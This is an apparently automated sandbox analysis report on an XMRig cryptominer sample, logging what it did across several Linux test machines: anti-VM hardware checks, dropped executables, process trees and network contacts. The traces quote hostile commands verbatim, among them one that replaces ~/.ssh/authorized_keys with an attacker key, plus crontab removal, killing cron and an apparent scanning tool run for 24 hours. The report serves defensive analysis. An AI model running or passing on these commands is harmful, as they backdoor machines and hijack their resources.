Malware Analysis Report

2024-10-16 05:30

Sample ID 240628-p5d92stcjl
Target 1a316d0973bb4f80adeda96a9ff52198_JaffaCakes118
SHA256 7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08
Tags
miner xmrig antivm rootkit
score
10/10

Analysis Overview

score
10/10

SHA256

7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08

Threat Level: Known bad

The file 1a316d0973bb4f80adeda96a9ff52198_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

miner xmrig antivm rootkit

XMRig Miner payload

Xmrig family

Executes dropped EXE

Loads a kernel module

Enumerates running processes

Checks hardware identifiers (DMI)

Reads hardware information

Checks CPU configuration

Reads CPU attributes

Reads runtime system information

Enumerates kernel/hardware configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-28 12:54

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/.rsync/a/anacron]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/.rsync/a/anacron N/A

Reads hardware information

Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/.rsync/a/anacron N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/.rsync/a/anacron N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/.rsync/a/anacron N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/dax/devices /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/dax/target_node /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/.rsync/a/anacron N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/.rsync/a/anacron N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/system/node/online /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/.rsync/a/anacron N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/mounts /tmp/.rsync/a/anacron N/A
File opened for reading /proc/meminfo /tmp/.rsync/a/anacron N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/.rsync/a/anacron N/A
File opened for reading /proc/elog /tmp/.rsync/a/anacron N/A

Processes

/tmp/.rsync/a/anacron

[/tmp/.rsync/a/anacron]

/bin/sh

[sh -c cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~]

Network

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libnss_dns.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libnss_dns.so.2

[/tmp/.rsync/c/lib/32/libnss_dns.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:54

Platform

ubuntu2404-amd64-20240523-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/64/libdl.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/64/libdl.so.2

[/tmp/.rsync/c/lib/64/libdl.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240418-en

Max time kernel

14s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node* -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep AMD Ryzen]

/bin/grep

[grep Intel]

/bin/cat

[cat /proc/cpuinfo]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240226-en

Max time kernel

4s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

Description Indicator Process Target

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240418-en

Max time kernel

147s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

The sequence from [touch v] through [rm -rf /tmp/t*] repeats unchanged; the trace contains 44 iterations in total, the last ending at [sleep 3].

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240611-en

Max time kernel

17s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node* -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep AMD Ryzen]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep Intel]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

/tmp/.rsync/a/upd

/tmp/.rsync/a/bash.pid

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240611-en

Max time kernel

10s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

/tmp/.rsync/a/bash.pid

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.5:443 tcp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240418-en

Max time kernel

2s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

147s

Max time network

129s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.19:443 tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

debian9-armhf-20240418-en

Max time kernel

148s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

